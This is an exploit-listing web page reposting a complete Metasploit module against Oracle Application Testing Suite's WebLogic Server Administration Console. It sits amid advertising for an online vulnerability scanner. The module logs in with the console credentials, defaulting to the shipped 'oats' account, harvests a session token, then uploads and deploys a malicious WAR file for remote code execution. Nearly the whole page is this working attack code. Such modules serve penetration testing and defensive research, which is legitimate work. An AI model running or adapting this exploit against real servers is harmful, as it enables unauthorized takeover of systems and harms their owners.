oracle application testing suite weblogic server administration console war deployment (metasploit)

▸▸▸ Exploit & Vulnerability >>   remote exploit & java vulnerability




Online Vulnerability Scanner Tools
oracle application testing suite weblogic server administration console war deployment (metasploit) Code Code... 
				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
      'Description'    => %q{
        This module abuses a feature in WebLogic Server's Administration Console to install
        a malicious Java application in order to gain remote code execution. Authentication
        is required, however by default, Oracle ships with a "oats" account that you could
        log in with, which grants you administrator access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Steven Seeley', # Used the trick and told me about it
          'sinn3r'         # Metasploit module
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'WebLogic Server Administration Console 12 or prior', { } ]
        ],
      'References'     =>
        [
          # The CVE description matches what this exploit is doing, but it was for version
          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
          # ['CVE', '2007-2699']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8088
        },
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2019',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
        OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
        OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
      ])

    register_advanced_options(
      [
        OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
      ])
  end

  class LoginSpec
    attr_accessor :admin_console_session
  end

  def login_spec
    @login_spec ||= LoginSpec.new
  end

  class OatsWarPayload < MetasploitModule
    attr_reader :name
    attr_reader :war

    def initialize(payload)
      @name = [Faker::App.name, Rex::Text.rand_name].sample
      @war = payload.encoded_war(app_name: name).to_s
    end
  end

  def default_oats_path
    datastore['DefaultOatsPath']
  end

  def war_payload
    @war_payload ||= OatsWarPayload.new(payload)
  end

  def set_frsc
    value = get_deploy_frsc
    @frsc = value
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    })

    if res && res.body.include?('Oracle WebLogic Server Administration Console')
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def set_admin_console_session(res)
    cookie = res.get_cookies
    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
    vprint_status("Token for console session is: #{admin_console_session}")
    login_spec.admin_console_session = admin_console_session
  end

  def is_logged_in?(res)
    html = res.get_html_document
    a_element = html.at('a')
    if a_element.respond_to?(:attributes) && a_element.attributes['href']
      link = a_element.attributes['href'].value
      return URI(link).request_uri == '/console'
    end

    false
  end

  def do_login
    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    fail_with(Failure::Unknown, 'No response from server') unless res
    set_admin_console_session(res)

    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_post' =>
        {
          'j_username'           => datastore['OATSUSERNAME'],
          'j_password'           => datastore['OATSPASSWORD'],
          'j_character_encoding' => 'UTF-8'
        }
    })

    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
    set_admin_console_session(res)
  end

  def get_deploy_frsc
    # First we are just going through the pages in a specific order to get the FRSC value
    # we need to prepare uploading the WAR file.
    res = nil
    requests =
      [
        { path: 'console/', vars: {} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
      ]

    requests.each do |req|
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, req[:path]),
        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
        'vars_get' => req[:vars]
      })

      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
    end

    html = res.get_html_document
    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
    frsc_attr ? frsc_attr.value : ''
  end

  def do_select_upload_action
    action = '/com/bea/console/actions/app/install/selectUploadApp'
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc' => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_upload_app_action
    action = '/com/bea/console/actions/app/install/uploadApp'
    ctype = 'application/octet-stream'
    app_cname = 'AppApplicationInstallPortletuploadAppPath'
    plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
    frsc_cname = 'AppApplicationInstallPortletfrsc'
    war = war_payload.war
    war_name = war_payload.name
    post_data = Rex::MIME::Message.new
    post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
    post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
    post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
       'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
       'data'    => post_data.to_s
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_app_select_action
    action = '/com/bea/console/actions/app/install/appSelected'
    war_name = war_payload.name
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc'            => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_style_select_action
    action = '/com/bea/console/actions/app/install/targetStyleSelected'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortlettargetStyle' => 'Application',
          'AppApplicationInstallPortletfrsc'        => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_finish_action
    action = '/com/bea/console/actions/app/install/finish'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletname'             => war_payload.name,
          'AppApplicationInstallPortletsecurityModel'    => 'DDOnly',
          'AppApplicationInstallPortletstagingStyle'     => 'Default',
          'AppApplicationInstallPortletplanStagingStyle' => 'Default',
          'AppApplicationInstallPortletfrsc'             => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)

    # 302 is a good enough indicator of a successful upload, otherwise
    # the server would actually return a 200 with an error message.
    res.code == 302
  end

  def print_response_message(res)
    html = res.get_html_document
    message_div = html.at('div[@class="message"]')
    if message_div
      msg = message_div.at('span').text
      print_status("Server replies: #{msg.inspect}")
    end
  end

  def deploy_war
    set_frsc
    print_status("FRSC value: #{frsc}")
    do_select_upload_action
    do_upload_app_action
    do_app_select_action
    do_style_select_action
    do_finish_action
  end

  def goto_war(name)
    print_good("Operation \"#{name}\" is a go!")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, name)
    })

    print_status("Code #{res.code} on \"#{name}\" request") if res
  end

  def undeploy_war
    war_name = war_payload.name
    handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
    contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
          'AppDeploymentsControlPortlethandle' => handle
        },
      'vars_post' =>
        {
          # For some reason, the value given to the server is escapped twice.
          # The Metasploit API should do it at least once.
          'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
          '_pageLabel' => 'AppApplicationUninstallPage',
          '_nfpb'      => 'true',
          'AppApplicationUninstallPortletfrsc' => frsc
        }
    })

    if res && res.code == 302
      print_good("Successfully undeployed #{war_name}.war")
    else
      print_warning("Unable to successfully undeploy #{war_name}.war")
      print_warning('You may want to do so manually.')
    end
  end

  def cleanup
    undeploy_war if is_cleanup_ready
    super
  end

  def setup
    @is_cleanup_ready = false
    super
  end

  def exploit
    unless check == Exploit::CheckCode::Detected
      print_status('Target does not have the login page we are looking for.')
      return
    end

    do_login
    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
    print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
    result = deploy_war
    if result
      @is_cleanup_ready = true
      goto_war(war_payload.name)
    end
  end

  attr_reader :frsc
  attr_reader :is_cleanup_ready
end

Oracle application testing suite weblogic server administration console war deployment (metasploit) Vulnerability / Exploit Source : Oracle application testing suite weblogic server administration console war deployment (metasploit)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.